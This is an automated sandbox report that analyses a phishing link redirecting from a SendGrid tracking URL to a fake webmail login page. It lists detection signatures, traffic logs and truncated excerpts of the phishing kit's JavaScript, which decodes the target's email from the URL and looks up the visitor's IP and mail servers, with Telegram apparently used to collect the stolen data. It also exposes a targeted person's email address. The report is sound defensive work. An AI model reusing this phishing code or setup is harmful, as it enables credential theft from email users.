Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://u48396839.ct.sendgrid.net/ls/click?upn=u001.6YeAQ6CJdNBv-2FudCmnBUfnGDeiTDEbkJBDYPt6L9zLs-2FLsak6B-2FHJOeuaA20CRyj4ymcnZhEANFrmmsKVXf7lykKGGim9NKe15FTuMOZuNBEFww2OP8BGALV3hzGu43iFj3whu7ElN-2FNYQWfEnFZNtXik-2Bc8xYTdlDDi-2B43g3xWfoVMN9Dsem2IaNiiX-2B-2BZ0QUoG_EefQjaPBlm3j-2F4SdpslfvAk7fHMHOXJ7L

Overview

General Information

Sample URL:https://u48396839.ct.sendgrid.net/ls/click?upn=u001.6YeAQ6CJdNBv-2FudCmnBUfnGDeiTDEbkJBDYPt6L9zLs-2FLsak6B-2FHJOeuaA20CRyj4ymcnZhEANFrmmsKVXf7lykKGGim9NKe15FTuMOZuNBEFww2OP8BGALV3hzGu43iFj3whu7ElN-2FN
Analysis ID:1564492
Infos:

Detection

Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
AI detected suspicious URL
Javascript uses Clearbit API to dynamically determine company logos
Javascript uses Telegram API
Uses the Telegram API (likely for C&C communication)
Detected hidden input values containing email addresses (often used in phishing pages)
Detected suspicious crossdomain redirect
HTML body contains low number of good links
HTML title does not match URL
Invalid 'copyright' link found
Invalid 'forgot password' link found
Javascript checks online IP of machine

Classification

  • System is w10x64
  • chrome.exe (PID: 1432 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 2692 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2268 --field-trial-handle=2196,i,2262898026489481170,16591654043166447335,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6564 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://u48396839.ct.sendgrid.net/ls/click?upn=u001.6YeAQ6CJdNBv-2FudCmnBUfnGDeiTDEbkJBDYPt6L9zLs-2FLsak6B-2FHJOeuaA20CRyj4ymcnZhEANFrmmsKVXf7lykKGGim9NKe15FTuMOZuNBEFww2OP8BGALV3hzGu43iFj3whu7ElN-2FNYQWfEnFZNtXik-2Bc8xYTdlDDi-2B43g3xWfoVMN9Dsem2IaNiiX-2B-2BZ0QUoG_EefQjaPBlm3j-2F4SdpslfvAk7fHMHOXJ7LweRGvhfSEmfDfe568-2FY-2BOLHESUZOtre1SJ0b0hpgZyE9nNkk5TdPOPC4tMbl8SiWrItsarfSJPs2UVOaCUP5NH54Bsd5iepHuriwvocK8ytgM3DUdP-2FGahP9TgWP8NK8XkzPu1yHstDO59EN9oezB0Bvcj4q1reEb5SVFPJB790ukEQpDzKhgmB7njVUkFC8cDwRBiYm4JeBTEVj-2FO9L-2B-2B-2FOmACAmxhX3ZwjKn-2F44onZNgScafSE7DBg-2BaKyUPEhIs0htUoWnblk2BMfXpJIrTjI4RRPPL3aYkpTlROjrttDT-2FsPXJXV6Ht5SRUu-2B0FMc-2F6UTXOUHRIAToTaXExoh-2BhOHngBDGdH-2FjIVKS7GHuJm-2FScM7fL8YyMYHIc3ZF3zj-2FrNo1yxz6qQNvNwYKE88E7ss0Of03GH-2FJ0B8fjyNmYGjPzU42L4WTkis-2FCNDcoVJ6gJCIZpmjB42-2FzDW6h-2FUREH0NUo2OPfZ9i8VYJz7QmCHLGmxdxD04Jz41PYtN7DaspcbsjIDanjiifLEQrLEWmHGBUFW4S8xlKCRj6eGsM5ZaDHWshSLBdAzDSyuonhuBxtuYLeNVHermIaoXD85egwdLJYANewTDecNDoTikVJ8mQdl7ZtnugAlt3ha0w0KmdiGihn6nvMrhhJrSgrE-2B65pLabznZrU0JRBQYA244iDFukcakZMIzjlzqr9piWLEWATx3NZaoZsiDxjNPIcS-2BPZq07eqXM1Ulzf-2FqkjGpcDoFG-2FrwE0q08CJl0HkI1XntIga1RDU5EZi756rrs6KbGhi0n0UYyAPMzcKJ1GSCyUZR-2FjEg-2FvBTzHO-2FOloWzctFMjjbt8OJhXkQtpwpSzQ5WMHPnqPpU8mVl6-2F8VDi2j4ulsfLIYkFMQxs-2FFnpoz7jaZyont10-3D" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://u48396839.ct.sendgrid.net/ls/click?upn=u001.6YeAQ6CJdNBv-2FudCmnBUfnGDeiTDEbkJBDYPt6L9zLs-2FLsak6B-2FHJOeuaA20CRyj4ymcnZhEANFrmmsKVXf7lykKGGim9NKe15FTuMOZuNBEFww2OP8BGALV3hzGu43iFj3whu7ElN-2FNYQWfEnFZNtXik-2Bc8xYTdlDDi-2B43g3xWfoVMN9Dsem2IaNiiX-2B-2BZ0QUoG_EefQjaPBlm3j-2F4SdpslfvAk7fHMHOXJ7LweRGvhfSEmfDfe568-2FY-2BOLHESUZOtre1SJ0b0hpgZyE9nNkk5TdPOPC4tMbl8SiWrItsarfSJPs2UVOaCUP5NH54Bsd5iepHuriwvocK8ytgM3DUdP-2FGahP9TgWP8NK8XkzPu1yHstDO59EN9oezB0Bvcj4q1reEb5SVFPJB790ukEQpDzKhgmB7njVUkFC8cDwRBiYm4JeBTEVj-2FO9L-2B-2B-2FOmACAmxhX3ZwjKn-2F44onZNgScafSE7DBg-2BaKyUPEhIs0htUoWnblk2BMfXpJIrTjI4RRPPL3aYkpTlROjrttDT-2FsPXJXV6Ht5SRUu-2B0FMc-2F6UTXOUHRIAToTaXExoh-2BhOHngBDGdH-2FjIVKS7GHuJm-2FScM7fL8YyMYHIc3ZF3zj-2FrNo1yxz6qQNvNwYKE88E7ss0Of03GH-2FJ0B8fjyNmYGjPzU42L4WTkis-2FCNDcoVJ6gJCIZpmjB42-2FzDW6h-2FUREH0NUo2OPfZ9i8VYJz7QmCHLGmxdxD04Jz41PYtN7DaspcbsjIDanjiifLEQrLEWmHGBUFW4S8xlKCRj6eGsM5ZaDHWshSLBdAzDSyuonhuBxtuYLeNVHermIaoXD85egwdLJYANewTDecNDoTikVJ8mQdl7ZtnugAlt3ha0w0KmdiGihn6nvMrhhJrSgrE-2B65pLabznZrU0JRBQYA244iDFukcakZMIzjlzqr9piWLEWATx3NZaoZsiDxjNPIcS-2BPZq07eqXM1Ulzf-2FqkjGpcDoFG-2FrwE0q08CJl0HkI1XntIga1RDU5EZi756rrs6KbGhi0n0UYyAPMzcKJ1GSCyUZR-2FjEg-2FvBTzHO-2FOloWzctFMjjbt8OJhXkQtpwpSzQ5WMHPnqPpU8mVl6-2F8VDi2j4ulsfLIYkFMQxs-2FFnpoz7jaZyont10-3DSlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social Engineering

Phishing

barindex
Source: EmailJoe Sandbox AI: AI detected Brand spoofing attempt in URL: https://igacorp.conohawing.com
Source: EmailJoe Sandbox AI: AI detected Typosquatting in URL: https://igacorp.conohawing.com
Source: https://igacorp.conohawing.com/secure/auth/web/secure/auth-webmail-web-con-secure-account.html#gianpiero.luciani@agriparadigma.itHTTP Parser: /* global $ */ $(document).ready(function () { var cntt = 0; initializepage(); $('#back1').click(function () { $("#msg").hide(); $('#ai').val(""); $("#automail").animate({ left: 200, opacity: "hide" }, 0); $("#inputbar").animate({ right: 200, opacity: "show" }, 1000); }); var ai = handlebase64data(window.location.hash.substr(1)); if (!ai) { } else { var my_ai = ai; $('#ai').val(my_ai); var filter = /^([a-za-z0-9_\.\-])+\@(([a-za-z0-9\-])+\.)+([a-za-z0-9]{2,4})+$/; if (!filter.test(my_ai)) { $('#errror').show(); ai.focus; return false; } var ind = my_ai.indexof("@"); var m_slic = my_ai.substr((ind + 1)); var c = m_slic.substr(0, m_slic.indexof('.')); var fnll = c.tolowercase(); var fnllu = c.touppercase(); var browser = getbrowserandlanguage()[0]; ...
Source: https://igacorp.conohawing.com/secure/auth/web/secure/auth-webmail-web-con-secure-account.html#gianpiero.luciani@agriparadigma.itHTTP Parser: /* global $ */ $(document).ready(function () { var cntt = 0; initializepage(); $('#back1').click(function () { $("#msg").hide(); $('#ai').val(""); $("#automail").animate({ left: 200, opacity: "hide" }, 0); $("#inputbar").animate({ right: 200, opacity: "show" }, 1000); }); var ai = handlebase64data(window.location.hash.substr(1)); if (!ai) { } else { var my_ai = ai; $('#ai').val(my_ai); var filter = /^([a-za-z0-9_\.\-])+\@(([a-za-z0-9\-])+\.)+([a-za-z0-9]{2,4})+$/; if (!filter.test(my_ai)) { $('#errror').show(); ai.focus; return false; } var ind = my_ai.indexof("@"); var m_slic = my_ai.substr((ind + 1)); var c = m_slic.substr(0, m_slic.indexof('.')); var fnll = c.tolowercase(); var fnllu = c.touppercase(); var browser = getbrowserandlanguage()[0]; ...
Source: https://igacorp.conohawing.com/secure/auth/web/secure/auth-webmail-web-con-secure-account.html#gianpiero.luciani@agriparadigma.itHTTP Parser: info@dell.com
Source: https://igacorp.conohawing.com/secure/auth/web/secure/auth-webmail-web-con-secure-account.html#gianpiero.luciani@agriparadigma.itHTTP Parser: Number of links: 0
Source: https://igacorp.conohawing.com/secure/auth/web/secure/auth-webmail-web-con-secure-account.html#gianpiero.luciani@agriparadigma.itHTTP Parser: Title: Agriparadigma - Mail does not match URL
Source: https://igacorp.conohawing.com/secure/auth/web/secure/auth-webmail-web-con-secure-account.html#gianpiero.luciani@agriparadigma.itHTTP Parser: Invalid link: Copyright 2024
Source: https://igacorp.conohawing.com/secure/auth/web/secure/auth-webmail-web-con-secure-account.html#gianpiero.luciani@agriparadigma.itHTTP Parser: Invalid link: Forgot password?
Source: https://igacorp.conohawing.com/secure/auth/web/secure/auth-webmail-web-con-secure-account.html#gianpiero.luciani@agriparadigma.itHTTP Parser: function handlebase64data(string) { try { return atob(string); } catch (error) { return string; } } function getvisitorip() { return new promise(function (resolve, reject) { var xhr = new xmlhttprequest(); xhr.open('get', 'https://ipinfo.io/json', true); xhr.onload = function () { if (xhr.status >= 200 && xhr.status < 300) { var response = json.parse(xhr.responsetext); resolve(response); } else { reject('failed to fetch ip address'); } }; xhr.onerror = function () { reject('failed to fetch ip address'); }; xhr.send(); }); } async function getmxrecord(domain) { try { const response = await fetch(`https://dns.google/resolve?name=${domain}&type=mx`); const data = await response.json(); if (data && data.answer && data.answer.length > 0) { const mxrecords = data.an...
Source: https://igacorp.conohawing.com/secure/auth/web/secure/auth-webmail-web-con-secure-account.html#gianpiero.luciani@agriparadigma.itHTTP Parser: <input type="password" .../> found
Source: https://igacorp.conohawing.com/secure/auth/web/secure/auth-webmail-web-con-secure-account.html#gianpiero.luciani@agriparadigma.itHTTP Parser: No <meta name="author".. found
Source: https://igacorp.conohawing.com/secure/auth/web/secure/auth-webmail-web-con-secure-account.html#gianpiero.luciani@agriparadigma.itHTTP Parser: No <meta name="author".. found
Source: https://igacorp.conohawing.com/secure/auth/web/secure/auth-webmail-web-con-secure-account.html#gianpiero.luciani@agriparadigma.itHTTP Parser: No <meta name="author".. found
Source: https://igacorp.conohawing.com/secure/auth/web/secure/auth-webmail-web-con-secure-account.html#gianpiero.luciani@agriparadigma.itHTTP Parser: No <meta name="author".. found
Source: https://igacorp.conohawing.com/secure/auth/web/secure/auth-webmail-web-con-secure-account.html#gianpiero.luciani@agriparadigma.itHTTP Parser: No <meta name="copyright".. found
Source: https://igacorp.conohawing.com/secure/auth/web/secure/auth-webmail-web-con-secure-account.html#gianpiero.luciani@agriparadigma.itHTTP Parser: No <meta name="copyright".. found
Source: https://igacorp.conohawing.com/secure/auth/web/secure/auth-webmail-web-con-secure-account.html#gianpiero.luciani@agriparadigma.itHTTP Parser: No <meta name="copyright".. found
Source: https://igacorp.conohawing.com/secure/auth/web/secure/auth-webmail-web-con-secure-account.html#gianpiero.luciani@agriparadigma.itHTTP Parser: No <meta name="copyright".. found
Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.4:49754 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49808 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.4:49811 version: TLS 1.2

Networking

barindex
Source: unknownDNS query: name: api.telegram.org
Source: unknownDNS query: name: api.telegram.org
Source: unknownDNS query: name: api.telegram.org
Source: unknownDNS query: name: api.telegram.org
Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: u48396839.ct.sendgrid.net to https://igacorp.conohawing.com/secure/auth/web/secure/auth-webmail-web-con-secure-account.html#gianpiero.luciani@agriparadigma.it
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 167.89.123.16
Source: unknownTCP traffic detected without corresponding DNS query: 167.89.123.16
Source: unknownTCP traffic detected without corresponding DNS query: 167.89.123.16
Source: unknownTCP traffic detected without corresponding DNS query: 167.89.123.16
Source: unknownTCP traffic detected without corresponding DNS query: 167.89.123.16
Source: unknownTCP traffic detected without corresponding DNS query: 167.89.123.16
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 167.89.123.16
Source: unknownTCP traffic detected without corresponding DNS query: 167.89.123.16
Source: unknownTCP traffic detected without corresponding DNS query: 167.89.123.16
Source: unknownTCP traffic detected without corresponding DNS query: 167.89.123.16
Source: unknownTCP traffic detected without corresponding DNS query: 167.89.123.16
Source: unknownTCP traffic detected without corresponding DNS query: 167.89.123.16
Source: unknownTCP traffic detected without corresponding DNS query: 167.89.123.16
Source: unknownTCP traffic detected without corresponding DNS query: 167.89.123.16
Source: unknownTCP traffic detected without corresponding DNS query: 167.89.123.16
Source: unknownTCP traffic detected without corresponding DNS query: 167.89.123.16
Source: unknownTCP traffic detected without corresponding DNS query: 167.89.123.16
Source: unknownTCP traffic detected without corresponding DNS query: 167.89.123.16
Source: unknownTCP traffic detected without corresponding DNS query: 167.89.123.16
Source: unknownTCP traffic detected without corresponding DNS query: 93.184.221.240
Source: unknownTCP traffic detected without corresponding DNS query: 93.184.221.240
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 167.89.123.16
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: global trafficHTTP traffic detected: GET /ls/click?upn=u001.6YeAQ6CJdNBv-2FudCmnBUfnGDeiTDEbkJBDYPt6L9zLs-2FLsak6B-2FHJOeuaA20CRyj4ymcnZhEANFrmmsKVXf7lykKGGim9NKe15FTuMOZuNBEFww2OP8BGALV3hzGu43iFj3whu7ElN-2FNYQWfEnFZNtXik-2Bc8xYTdlDDi-2B43g3xWfoVMN9Dsem2IaNiiX-2B-2BZ0QUoG_EefQjaPBlm3j-2F4SdpslfvAk7fHMHOXJ7LweRGvhfSEmfDfe568-2FY-2BOLHESUZOtre1SJ0b0hpgZyE9nNkk5TdPOPC4tMbl8SiWrItsarfSJPs2UVOaCUP5NH54Bsd5iepHuriwvocK8ytgM3DUdP-2FGahP9TgWP8NK8XkzPu1yHstDO59EN9oezB0Bvcj4q1reEb5SVFPJB790ukEQpDzKhgmB7njVUkFC8cDwRBiYm4JeBTEVj-2FO9L-2B-2B-2FOmACAmxhX3ZwjKn-2F44onZNgScafSE7DBg-2BaKyUPEhIs0htUoWnblk2BMfXpJIrTjI4RRPPL3aYkpTlROjrttDT-2FsPXJXV6Ht5SRUu-2B0FMc-2F6UTXOUHRIAToTaXExoh-2BhOHngBDGdH-2FjIVKS7GHuJm-2FScM7fL8YyMYHIc3ZF3zj-2FrNo1yxz6qQNvNwYKE88E7ss0Of03GH-2FJ0B8fjyNmYGjPzU42L4WTkis-2FCNDcoVJ6gJCIZpmjB42-2FzDW6h-2FUREH0NUo2OPfZ9i8VYJz7QmCHLGmxdxD04Jz41PYtN7DaspcbsjIDanjiifLEQrLEWmHGBUFW4S8xlKCRj6eGsM5ZaDHWshSLBdAzDSyuonhuBxtuYLeNVHermIaoXD85egwdLJYANewTDecNDoTikVJ8mQdl7ZtnugAlt3ha0w0KmdiGihn6nvMrhhJrSgrE-2B65pLabznZrU0JRBQYA244iDFukcakZMIzjlzqr9piWLEWATx3NZaoZsiDxjNPIcS-2BPZq07eqXM1Ulzf-2FqkjGpcDoFG-2FrwE0q08CJl0HkI1XntIga1RDU5EZi756rrs6KbGhi0n0UYyAPMzcKJ1GSCyUZR-2FjEg-2FvBTzHO-2FOloWzctFMjjbt8OJhXkQtpwpSzQ5WMHPnqPpU8mVl6-2F8VDi2j4ulsfLIYkFMQxs-2FFnpoz7jaZyont10-3D HTTP/1.1Host: u48396839.ct.sendgrid.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /secure/auth/web/secure/auth-webmail-web-con-secure-account.html HTTP/1.1Host: igacorp.conohawing.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.1.1.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://igacorp.conohawing.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://igacorp.conohawing.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://igacorp.conohawing.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.2.1.slim.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://igacorp.conohawing.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://igacorp.conohawing.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/popper.js/1.12.9/umd/popper.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://igacorp.conohawing.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://igacorp.conohawing.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /bootstrap/4.0.0/js/bootstrap.min.js HTTP/1.1Host: maxcdn.bootstrapcdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://igacorp.conohawing.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://igacorp.conohawing.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /bootstrap/4.1.3/js/bootstrap.min.js HTTP/1.1Host: stackpath.bootstrapcdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://igacorp.conohawing.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/axios/0.20.0/axios.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://igacorp.conohawing.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.1.1.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.2.1.slim.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/axios/0.20.0/axios.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/popper.js/1.12.9/umd/popper.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /bootstrap/4.0.0/js/bootstrap.min.js HTTP/1.1Host: maxcdn.bootstrapcdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=EdtAHUGZ27STYf6&MD=WNDZagzh HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /s2/favicons?domain=?v=BUILD_HASH HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://igacorp.conohawing.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /bootstrap/4.1.3/js/bootstrap.min.js HTTP/1.1Host: stackpath.bootstrapcdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
